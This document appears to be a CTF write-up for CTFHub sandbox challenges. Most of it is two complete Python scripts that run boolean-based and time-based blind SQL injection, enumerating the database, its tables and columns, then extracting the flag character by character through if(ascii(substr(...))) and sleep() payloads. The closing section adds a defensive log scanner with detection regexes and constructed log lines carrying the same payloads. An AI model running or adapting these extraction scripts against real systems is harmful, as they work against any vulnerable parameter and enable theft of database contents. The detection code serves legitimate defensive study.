Binary-search scripts for SQL boolean-based and time-based blind injection
Boolean-based blind injection:
import requests

url = "http://challenge-f0b629835417963e.sandbox.ctfhub.com:10080/"

# Each function recovers one string character by character. For position i a
# binary search over the printable ASCII range (32..127) asks the oracle
# "is ascii(char_i) > mid?"; the page contains "query_success" whenever the
# injected condition is true. ascii() of a position past the end of the string
# is 0, so the search converges on 32 and the outer loop stops (a literal space
# in the data would stop it as well).

def inject_database(url):
    name = ''
    for i in range(1, 100000):
        low = 32
        high = 128
        mid = (low + high) // 2
        while low < high:
            payload = "if(ascii(substr((select database()),%d,1))>%d,1,0)" % (i, mid)
            params = {'id': payload}
            r = requests.get(url, params=params)
            if "query_success" in r.text:   # condition true: character is above mid
                low = mid + 1
            else:
                high = mid
            mid = (low + high) // 2
        if mid == 32:   # nothing at this position: the string is complete
            break
        name = name + chr(mid)
        print(name)

def inject_table(url):
    name = ''
    for i in range(1, 100000):
        low = 32
        high = 128
        mid = (low + high) // 2
        while low < high:
            payload = "if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema = 'sqli'),%d,1))>%d,1,0)" % (i, mid)
            params = {'id': payload}
            r = requests.get(url, params=params)
            if "query_success" in r.text:
                low = mid + 1
            else:
                high = mid
            mid = (low + high) // 2
        if mid == 32:
            break
        name = name + chr(mid)
        print(name)

def inject_column(url):
    name = ''
    for i in range(1, 100000):
        low = 32
        high = 128
        mid = (low + high) // 2
        while low < high:
            payload = "if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name = 'flag'),%d,1))>%d,1,0)" % (i, mid)
            params = {'id': payload}
            r = requests.get(url, params=params)
            if "query_success" in r.text:
                low = mid + 1
            else:
                high = mid
            mid = (low + high) // 2
        if mid == 32:
            break
        name = name + chr(mid)
        print(name)

def flag(url):
    name = ''
    for i in range(1, 100000):
        low = 32
        high = 128
        mid = (low + high) // 2
        while low < high:
            payload = "if(ascii(substr((select flag from flag),%d,1))>%d,1,0)" % (i, mid)
            params = {'id': payload}
            r = requests.get(url, params=params)
            if "query_success" in r.text:
                low = mid + 1
            else:
                high = mid
            mid = (low + high) // 2
        if mid == 32:
            break
        name = name + chr(mid)
        print(name)

# Run the steps in order; each one is commented out once its result is known.
# inject_database(url)
# inject_table(url)
# inject_column(url)
flag(url)
Time-based blind injection:
import requests
import time
# time.time()

url = "http://challenge-a869b4d983fcacff.sandbox.ctfhub.com:10080/"

# Same binary search as above, but the oracle is timing: the true branch runs
# sleep(1), so a response that takes longer than one second is read as "true".
# Network latency alone can cross that threshold and corrupt a character, so a
# slow link needs a longer sleep or a higher cut-off.

def inject_database(url):
    name = ''
    for i in range(1, 100000):
        low = 32
        high = 128
        mid = (low + high) // 2
        while low < high:
            payload = "if(ascii(substr((select database()),%d,1))>%d,sleep(1),0)" % (i, mid)
            params = {'id': payload}
            start_time = time.time()   # system time before the request
            r = requests.get(url, params=params)
            end_time = time.time()     # time after the response arrived
            if end_time - start_time > 1:   # sleep(1) fired: character is above mid
                low = mid + 1
            else:
                high = mid
            mid = (low + high) // 2
        if mid == 32:
            break
        name = name + chr(mid)
        print(name)

# The next two subqueries have no group_concat(), so they assume the 'sqli'
# schema holds a single table and the 'flag' table a single column; MySQL
# rejects the subquery if more than one row comes back.
def inject_table(url):
    name = ''
    for i in range(1, 100000):
        low = 32
        high = 128
        mid = (low + high) // 2
        while low < high:
            payload = "if(ascii(substr((select table_name from information_schema.tables where table_schema='sqli'),%d,1))>%d,sleep(1),0)" % (i, mid)
            params = {'id': payload}
            start_time = time.time()   # system time before the request
            r = requests.get(url, params=params)
            end_time = time.time()     # time after the response arrived
            if end_time - start_time > 1:
                low = mid + 1
            else:
                high = mid
            mid = (low + high) // 2
        if mid == 32:
            break
        name = name + chr(mid)
        print(name)

def inject_column(url):
    name = ''
    for i in range(1, 100000):
        low = 32
        high = 128
        mid = (low + high) // 2
        while low < high:
            payload = "if(ascii(substr((select column_name from information_schema.columns where table_name='flag'),%d,1))>%d,sleep(1),0)" % (i, mid)
            params = {'id': payload}
            start_time = time.time()   # system time before the request
            r = requests.get(url, params=params)
            end_time = time.time()     # time after the response arrived
            if end_time - start_time > 1:
                low = mid + 1
            else:
                high = mid
            mid = (low + high) // 2
        if mid == 32:
            break
        name = name + chr(mid)
        print(name)

def flag(url):
    name = ''
    for i in range(1, 100000):
        low = 32
        high = 128
        mid = (low + high) // 2
        while low < high:
            payload = "if(ascii(substr((select flag from flag),%d,1))>%d,sleep(1),0)" % (i, mid)
            params = {'id': payload}
            start_time = time.time()   # system time before the request
            r = requests.get(url, params=params)
            end_time = time.time()     # time after the response arrived
            if end_time - start_time > 1:
                low = mid + 1
            else:
                high = mid
            mid = (low + high) // 2
        if mid == 32:
            break
        name = name + chr(mid)
        print(name)

# Run the steps in order; each one is commented out once its result is known.
# inject_database(url)
# inject_table(url)
# inject_column(url)
flag(url)
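Seen from the server side, both scripts above leave a very recognisable trail: dozens of requests per character, all on one parameter, each carrying an if(ascii(substr(...))>N comparison (plus sleep() for the timing variant) with N narrowing by binary search. As an added example that is not part of the original post, the following log scanner flags those request shapes and counts probes per client; the access-log lines it scans are constructed here, and `classify_request` and `scan_log` are names introduced for this example.

```python
import re
from collections import Counter
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines (combined log format), not taken from the
# page: one ordinary request, then blind-injection probes shaped like the
# page's payloads, all from one client. Thresholds 80 -> 104 -> 116 are the
# binary-search narrowing the scripts above perform for each character.
SAMPLE_LOG = """\
203.0.113.5 - - [01/Jan/2024:10:00:00 +0000] "GET /?id=1 HTTP/1.1" 200 512
203.0.113.9 - - [01/Jan/2024:10:00:01 +0000] "GET /?id=if(ascii(substr((select+database()),1,1))>80,1,0) HTTP/1.1" 200 512
203.0.113.9 - - [01/Jan/2024:10:00:01 +0000] "GET /?id=if(ascii(substr((select+database()),1,1))>104,1,0) HTTP/1.1" 200 488
203.0.113.9 - - [01/Jan/2024:10:00:02 +0000] "GET /?id=if(ascii(substr((select+group_concat(table_name)+from+information_schema.tables+where+table_schema+%3D+%27sqli%27),1,1))>116,1,0) HTTP/1.1" 200 488
203.0.113.9 - - [01/Jan/2024:10:00:04 +0000] "GET /?id=if(ascii(substr((select+flag+from+flag),1,1))>80,sleep(1),0) HTTP/1.1" 200 512
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# A boolean oracle compares ascii(substr(...)) with a threshold; a time oracle
# additionally calls sleep() in the true branch. Touching information_schema
# or database() marks a schema-enumeration probe.
BOOL_RE = re.compile(r"if\s*\(\s*ascii\s*\(\s*substr\s*\(.*?\)\s*>\s*(?P<threshold>\d+)", re.I | re.S)
TIME_RE = re.compile(r"\bsleep\s*\(\s*\d+(?:\.\d+)?\s*\)", re.I)
SCHEMA_RE = re.compile(r"information_schema|database\s*\(\s*\)", re.I)

def classify_request(line):
    """Return a finding dict for one log line, or None if no oracle pattern is present."""
    m = LOG_RE.match(line)
    if not m:
        return None
    query = urlsplit(m.group("target")).query      # parse_qs decodes %xx and '+'
    for param, values in parse_qs(query, keep_blank_values=True).items():
        for value in values:
            bool_hit = BOOL_RE.search(value)
            time_hit = TIME_RE.search(value)
            if not (bool_hit or time_hit):
                continue
            return {
                "ip": m.group("ip"),
                "param": param,
                "kind": "time" if time_hit else "boolean",
                "threshold": int(bool_hit.group("threshold")) if bool_hit else None,
                "schema_probe": bool(SCHEMA_RE.search(value)),
            }
    return None

def scan_log(text):
    """Scan a whole log; return (findings, number of flagged requests per client IP)."""
    findings = [f for f in map(classify_request, text.splitlines()) if f]
    return findings, Counter(f["ip"] for f in findings)
```

A real deployment would alert on the per-client count and on the monotonic threshold sequence rather than on any single request, since one stray if(...) can be a manual test while hundreds in a few seconds are automated extraction.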